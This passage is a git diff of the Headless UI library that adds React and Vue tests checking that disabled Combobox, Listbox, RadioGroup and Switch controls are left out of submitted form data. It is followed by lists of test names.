Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() let options = [ diff --git a/packages/@headlessui-react/src/components/listbox/listbox.test.tsx b/packages/@headlessui-react/src/components/listbox/listbox.test.tsx index acab326..b06c177 100644 --- a/packages/@headlessui-react/src/components/listbox/listbox.test.tsx +++ 
b/packages/@headlessui-react/src/components/listbox/listbox.test.tsx @@ -4670,6 +4670,47 @@ describe('Form compatibility', () => { expect(submits).toHaveBeenLastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Listbox is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Listbox value={value} onChange={setValue} name="delivery" disabled> + <Listbox.Button>Trigger</Listbox.Button> + <Listbox.Label>Pizza Delivery</Listbox.Label> + <Listbox.Options> + <Listbox.Option value="pickup">Pickup</Listbox.Option> + <Listbox.Option value="home-delivery">Home delivery</Listbox.Option> + <Listbox.Option value="dine-in">Dine in</Listbox.Option> + </Listbox.Options> + </Listbox> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Open listbox + await click(getListboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() let options = [ diff --git a/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx b/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx index 85f0fd4..436b2e3 100644 --- a/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx +++ b/packages/@headlessui-react/src/components/radio-group/radio-group.test.tsx @@ -1539,6 +1539,41 @@ describe('Form compatibility', () => { }) ) + it('should not submit the data if the RadioGroup is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [value, 
setValue] = useState('home-delivery') + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <RadioGroup value={value} onChange={setValue} name="delivery" disabled> + <RadioGroup.Label>Pizza Delivery</RadioGroup.Label> + <RadioGroup.Option value="pickup">Pickup</RadioGroup.Option> + <RadioGroup.Option value="home-delivery">Home delivery</RadioGroup.Option> + <RadioGroup.Option value="dine-in">Dine in</RadioGroup.Option> + </RadioGroup> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it( 'should be possible to submit a form with a complex value object', suppressConsoleLogs(async () => { diff --git a/packages/@headlessui-react/src/components/switch/switch.test.tsx b/packages/@headlessui-react/src/components/switch/switch.test.tsx index b6988f2..06d2c46 100644 --- a/packages/@headlessui-react/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-react/src/components/switch/switch.test.tsx @@ -810,4 +810,37 @@ describe('Form compatibility', () => { // Verify that the form has been submitted expect(submits).toHaveBeenLastCalledWith([['fruit', 'apple']]) }) + + it('should not submit the data if the Switch is disabled', async () => { + let submits = jest.fn() + + function Example() { + let [state, setState] = useState(true) + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Switch.Group> + <Switch checked={state} onChange={setState} name="fruit" value="apple" disabled /> + <Switch.Label>Apple</Switch.Label> + </Switch.Group> + <button>Submit</button> + </form> + ) + } + 
+ render(<Example />) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) }) diff --git a/packages/@headlessui-react/src/test-utils/scenarios.tsx b/packages/@headlessui-react/src/test-utils/scenarios.tsx index 31ee14f..c576a43 100644 --- a/packages/@headlessui-react/src/test-utils/scenarios.tsx +++ b/packages/@headlessui-react/src/test-utils/scenarios.tsx @@ -202,6 +202,35 @@ export function commonFormScenarios( expect(formDataMock.mock.calls[0][0].has('foo')).toBe(true) }) + it('should not submit the data if the control is disabled', async () => { + let submits = jest.fn() + + function Example() { + return ( + <form + onSubmit={(event) => { + event.preventDefault() + submits([...new FormData(event.currentTarget).entries()]) + }} + > + <input type="hidden" name="foo" value="bar" /> + <Control name="bar" disabled /> + <button>Submit</button> + </form> + ) + } + + render(<Example />) + + // Submit the form + await click(screen.getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it( 'should reset the control when the form is reset', suppressConsoleLogs(async () => { diff --git a/packages/@headlessui-vue/src/components/combobox/combobox.test.ts b/packages/@headlessui-vue/src/components/combobox/combobox.test.ts index a3b638f..3222bf1 100644 --- a/packages/@headlessui-vue/src/components/combobox/combobox.test.ts +++ b/packages/@headlessui-vue/src/components/combobox/combobox.test.ts @@ -6146,6 +6146,49 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Combobox is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" 
name="foo" value="bar" /> + <Combobox v-model="value" name="delivery" disabled> + <ComboboxInput /> + <ComboboxButton>Trigger</ComboboxButton> + <ComboboxOptions> + <ComboboxOption value="pickup">Pickup</ComboboxOption> + <ComboboxOption value="home-delivery">Home delivery</ComboboxOption> + <ComboboxOption value="dine-in">Dine in</ComboboxOption> + </ComboboxOptions> + </Combobox> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Open combobox + await click(getComboboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx b/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx index 5beb32b..b09c3c3 100644 --- a/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx +++ b/packages/@headlessui-vue/src/components/listbox/listbox.test.tsx @@ -5071,6 +5071,48 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the Listbox is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <Listbox v-model="value" name="delivery" disabled> + <ListboxButton>Trigger</ListboxButton> + <ListboxOptions> + <ListboxOption value="pickup">Pickup</ListboxOption> + <ListboxOption value="home-delivery">Home delivery</ListboxOption> + <ListboxOption value="dine-in">Dine in</ListboxOption> + 
</ListboxOptions> + </Listbox> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Open listbox + await click(getListboxButton()) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts b/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts index f491ae1..42d671a 100644 --- a/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts +++ b/packages/@headlessui-vue/src/components/radio-group/radio-group.test.ts @@ -1680,6 +1680,43 @@ describe('Form compatibility', () => { expect(submits).lastCalledWith([['delivery', 'pickup']]) }) + it('should not submit the data if the RadioGroup is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <RadioGroup v-model="value" name="delivery" disabled> + <RadioGroupLabel>Pizza Delivery</RadioGroupLabel> + <RadioGroupOption value="pickup">Pickup</RadioGroupOption> + <RadioGroupOption value="home-delivery">Home delivery</RadioGroupOption> + <RadioGroupOption value="dine-in">Dine in</RadioGroupOption> + </RadioGroup> + <button>Submit</button> + </form> + `, + setup: () => { + let value = ref('home-delivery') + return { + value, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Submit the form + await 
click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) + it('should be possible to submit a form with a complex value object', async () => { let submits = jest.fn() diff --git a/packages/@headlessui-vue/src/components/switch/switch.test.tsx b/packages/@headlessui-vue/src/components/switch/switch.test.tsx index c4008b4..ce39576 100644 --- a/packages/@headlessui-vue/src/components/switch/switch.test.tsx +++ b/packages/@headlessui-vue/src/components/switch/switch.test.tsx @@ -929,4 +929,39 @@ describe('Form compatibility', () => { // Verify that the form has been submitted expect(submits).lastCalledWith([['fruit', 'apple']]) }) + + it('should not submit the data if the Switch is disabled', async () => { + let submits = jest.fn() + + renderTemplate({ + template: html` + <form @submit="handleSubmit"> + <input type="hidden" name="foo" value="bar" /> + <SwitchGroup> + <Switch v-model="checked" name="fruit" value="apple" disabled /> + <SwitchLabel>Apple</SwitchLabel> + </SwitchGroup> + <button>Submit</button> + </form> + `, + setup: () => { + let checked = ref(true) + return { + checked, + handleSubmit(event: SubmitEvent) { + event.preventDefault() + submits([...new FormData(event.currentTarget as HTMLFormElement).entries()]) + }, + } + }, + }) + + // Submit the form + await click(getByText('Submit')) + + // Verify that the form has been submitted + expect(submits).toHaveBeenLastCalledWith([ + ['foo', 'bar'], // The only available field + ]) + }) })
[ "should not submit the data if the Switch is disabled", "should not submit the data if the RadioGroup is disabled", "should fire events in the correct order", "should not submit the data if the Listbox is disabled", "should transition in completely", "should transition out completely", "should transition in and out completely", "should not submit the data if the Combobox is disabled" ]
[ "should be possible to get the text value from an element", "should strip out emojis when receiving the text from the element", "should strip out hidden elements", "should strip out aria-hidden elements", "should strip out role=\"img\" elements", "should be possible to get the text value from the aria-label", "should be possible to get the text value from the aria-label (even if there is content)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents)", "should be possible to get the text value from the element referenced by aria-labelledby (using `aria-label`, multiple)", "should be possible to get the text value from the element referenced by aria-labelledby (using its contents, multiple)", "should be possible to server side render the first Tab and Panel", "should be possible to server side render the defaultIndex Tab and Panel", "should be possible to transition", "should keep the delay time into account", "should be possible to cancel a transition at any time", "A transition without appear=true does not insert classes during SSR", "should not overwrite className of children when as=Fragment", "should wait the correct amount of time to finish a transition", "should be possible to server side render the Disclosure in a closed state", "should be possible to server side render the Disclosure in an open state", "should be possible to use useLabels without using a Label", "should be possible to use useLabels and a single Label, and have them linked", "should be possible to use useLabels and multiple Label components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Label component", "should be possible to server side render the selectedIndex=0 Tab and Panel", "should be possible to server side render the selectedIndex=1 Tab and Panel", "should 
be possible to use useDescriptions without using a Description", "should be possible to use useDescriptions and a single Description, and have them linked", "should be possible to use useDescriptions and multiple Description components, and have them linked", "should be possible to update a prop from the parent and it should reflect in the Description component", "should be possible to use a LabelProvider without using a Label", "should be possible to use a LabelProvider and a single Label, and have them linked", "should be possible to use a LabelProvider and multiple Label components, and have them linked", "should focus the first focusable element inside the FocusTrap", "should focus the autoFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap if that exists", "should focus the initialFocus element inside the FocusTrap even if another element has autoFocus", "should warn when there is no focusable element inside the FocusTrap", "should not be possible to programmatically escape the focus trap", "should restore the previously focused element, before entering the FocusTrap, after the FocusTrap unmounts", "should stay in the FocusTrap when using `tab`, if there is only 1 focusable element", "should stay in the FocusTrap when using `shift+tab`, if there is only 1 focusable element", "should be possible to tab to the next focusable element within the focus trap", "should be possible to shift+tab to the previous focusable element within the focus trap", "should skip the initial \"hidden\" elements within the focus trap", "should be possible skip \"hidden\" elements within the focus trap", "should be possible skip disabled elements within the focus trap", "should not be possible to escape the FocusTrap due to strange tabIndex usage", "should be possible to use a DescriptionProvider without using a Description", "should be possible to use a DescriptionProvider and a single Description, and have them linked", 
"should be possible to use a DescriptionProvider and multiple Description components, and have them linked", "should encode an input of {\"a\":\"b\"} to an form data output", "should encode an input of [1,2,3] to an form data output", "should encode an input of {\"id\":1,\"admin\":true,\"name\":{\"first\":\"Jane\",\"last\":\"Doe\",\"nickname\":{\"preferred\":\"JDoe\"}}} to an form data output", "should be possible to inert an element", "should mark the element as not inert anymore, once all references are gone", "should expose the correct components", "should not mark an element as inert when the hook is disabled", "should render a `Fieldset` component", "should add an `aria-disabled` attribute when disabling the `Fieldset`", "should link a `Fieldset` to a nested `Legend`", "should not link a `Label` inside a `Field` to the `Fieldset`", "should render a `Field` component", "should render a `Field` component with a render prop", "should add `aria-disabled` when a `Field` is disabled", "should inherit the `disabled` state from a parent `Fieldset`", "should be possible tab to the next focusable element within the focus trap", "should be possible shift+tab to the previous focusable element within the focus trap", "should be possible to use a Portal", "should be possible to use multiple Portal elements", "should cleanup the Portal root when the last Portal is unmounted", "should be possible to render multiple portals at the same time", "should be possible to tamper with the modal root and restore correctly", "should be possible to force the Portal into a specific element using Portal.Group", "should fire the correct events 0", "should fire the correct events 1", "should fire the correct events 2", "should fire the correct events 3", "should fire the correct events 4", "should fire the correct events 5", "should fire the correct events 6", "should fire the correct events 7", "should fire the correct events 8", "should fire the correct events 9", "should fire the correct 
events 10", "should fire the correct events 11", "should fire the correct events 12", "should fire the correct events 13", "should fire the correct events 14", "should fire the correct events 15", "should fire the correct events 16", "should fire the correct events 17", "should fire the correct events 18", "should fire the correct events 19", "should fire the correct events 20", "should fire the correct events 21", "should error when using an as=\"template\" with additional props", "should forward the props to the first child", "should forward the props via Functional Components", "should allow use of <slot> as children", "as=element", "as=template", "SSR-rendering a Portal should not error", "should be possible to force the Portal into a specific element using PortalGroup", "should be possible to render a dummy component", "should be possible to merge classes when rendering", "should be possible to merge class fns when rendering", "should be possible to render a dummy component with some children as a callback", "should be possible to add a ref with a different name", "should be possible to passthrough props to a dummy component", "should be possible to change the underlying DOM node using the `as` prop", "should be possible to change the underlying DOM node using the `as` prop and still have a function as children", "should be possible to render the children only when the `as` prop is set to Fragment", "should forward all the props to the first child when using an as={Fragment}", "should error when we are rendering a Fragment with multiple children", "should not error when we are rendering a Fragment with multiple children when we don't passthrough additional props", "should error when we are applying props to a Fragment when we do not have a dedicated element", "should be possible to render a `static` dummy component (show = true)", "should be possible to render a `static` dummy component (show = false)", "should be possible to render an `unmount` dummy 
component (show = true)", "should be possible to render an `unmount` dummy component (show = false)", "should be possible to render an `unmount={false}` dummy component (show = true)", "should be possible to render an `unmount={false}` dummy component (show = false)", "should result in a typescript error", "should render a button", "should default to `type=\"button\"`", "should render a button using a render prop", "should map the `autoFocus` prop to a `data-autofocus` attribute", "should expose focus data attributes on the element", "should expose hover data attributes on the element", "should error when we are using a <DisclosureButton /> without a parent <Disclosure />", "should error when we are using a <DisclosurePanel /> without a parent <Disclosure />", "should be possible to render a Disclosure without crashing", "should be possible to render a Disclosure using a render prop", "should be possible to render a Disclosure in an open state by default", "should expose a close function that closes the disclosure", "should expose a close function that closes the disclosure and restores to a specific element", "should expose a close function that closes the disclosure and restores to a ref", "should be possible to render a DisclosureButton using a render prop", "should be possible to render a DisclosureButton using a render prop and an `as` prop", "should set the `type` to \"button\" by default", "should not set the `type` to \"button\" if it already contains a `type`", "should set the `type` to \"button\" when using the `as` prop which resolves to a \"button\"", "should not set the type if the \"as\" prop is not a \"button\"", "should not set the `type` to \"button\" when using the `as` prop which resolves to a \"div\"", "should be possible to render DisclosurePanel using a render prop", "should be possible to always render the DisclosurePanel if we provide it a `static` prop", "should be possible to use a different render strategy for the DisclosurePanel", 
"should always open the DisclosurePanel because of a wrapping OpenClosed component", "should always close the DisclosurePanel because of a wrapping OpenClosed component", "should be possible to read the OpenClosed state", "should be possible to open the Disclosure with Enter", "should not be possible to open the disclosure with Enter when the button is disabled", "should be possible to close the disclosure with Enter when the disclosure is open", "should be possible to open the disclosure with Space", "should not be possible to open the disclosure with Space when the button is disabled", "should be possible to close the disclosure with Space when the disclosure is open", "should be possible to open a disclosure on click", "should not be possible to open a disclosure on right click", "should not be possible to open a disclosure on click when the button is disabled", "should be possible to close a disclosure on click", "should be possible to close the Disclosure by clicking on a DisclosureButton inside a DisclosurePanel", "should render a control", "should have an `id` attached", "should be possible to override the `id`", "should mark the control as disabled, if the `Field` is disabled", "should link a control and a `Label` when inside a `Field`", "should link a control and multiple `Label` components when inside a `Field`", "should link a control and a `Description` when inside a `Field`", "should link a control and multiple `Description` components when inside a `Field`", "should link a control with a `Label` and a `Description` when inside a `Field`", "should be possible to click a `Label`, and focus the control when in a `Field`", "should not be possible to click a `Label`, if the `Label` has the `passive` prop", "should not be possible to click a `Label` and focus the control, if the control is disabled", "should not be possible to click a `Label` and focus the control, if the `Field` is disabled", "should not be possible to click a `Label` and focus the 
control, if the `Fieldset` is disabled", "should render native (hidden) form elements for the control", "should submit the form with all the data", "should not submit the data if the control is disabled", "should reset the control when the form is reset", "should generate css for an exposed state", "should generate the inverse \"not\" css for an exposed state", "should generate the ui-focus-visible variant", "should generate the ui-not-focus-visible variant", "should error when we are using a <Disclosure.Button /> without a parent <Disclosure />", "should error when we are using a <Disclosure.Panel /> without a parent <Disclosure />", "should not crash when using Suspense boundaries", "should be possible to render a Disclosure.Button using a render prop", "should be possible to render a Disclosure.Button using a render prop and an `as` prop", "should be possible to render Disclosure.Panel using a render prop", "should be possible to always render the Disclosure.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Disclosure.Panel", "should be possible to control the Disclosure.Panel by wrapping it in a Transition component", "should be possible to close the Disclosure by clicking on a Disclosure.Button inside a Disclosure.Panel", "should be possible to put the checkbox in an indeterminate state", "should be possible to put the checkbox in an default checked state", "should render a checkbox in an unchecked state", "should be possible to toggle a checkbox", "should be possible to toggle a checkbox by clicking it", "should be possible to use in an uncontrolled way", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the 
switch contents as the label", "should have a default tabIndex of `0`", "should be possible to override the `tabIndex`", "should not be possible to override the `tabIndex` to `-1`", "should be possible to use in an uncontrolled way with a value", "should be possible to provide a default value", "should be possible to reset to the default value if the form is reset", "should still call the onChange listeners when choosing new values", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to put classes on a SwitchLabel", "should be possible to put 
classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should error when we are using a <RadioGroupOption /> without a parent <RadioGroup />", "should be possible to render a RadioGroup without crashing", "should be possible to render a RadioGroup without options and without crashing", "should be possible to render a RadioGroup, where the first element is tabbable (value is undefined)", "should be possible to render a RadioGroup, where the first element is tabbable (value is null)", "should be possible to render a RadioGroup with an active value", "should guarantee the radio option order after a few unmounts", "should be possible to render a RadioGroupOption with a render prop", "should set the checked v-slot info to true for the selected item (testing with objects, because Vue proxies)", "should be possible to put classes on a RadioGroup", "should be possible to put classes on a RadioGroupOption", "should be possible to disable a RadioGroup", "should be possible to disable a RadioGroup.Option", "should guarantee the order of DOM nodes when performing actions", "should be possible to use a custom component using the `as` prop without crashing", "should use object equality by default", "should be possible to compare null values by a field", "should be possible to compare objects by a field", "should be possible to compare objects by a comparator function", "should be possible to reset to the default value if the form is reset (using objects)", "should be possible to tab to the first item", "should not change the selected element on focus", "should be possible to tab to the active item", "should not change the selected element on focus (when selecting the active item)", "should be possible to tab out of the radio group (no selected value)", "should be possible to tab out of the radio group (selected value)", "should go to the previous item when pressing the ArrowLeft key", "should go to the previous item when pressing the ArrowUp 
key", "should go to the next item when pressing the ArrowRight key", "should go to the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first 
focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", 
"should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the 
Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when 
you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using 
a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should be possible to render a Menu using a render prop", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should not override an explicit disabled prop on MenuItems child", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no 
menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and 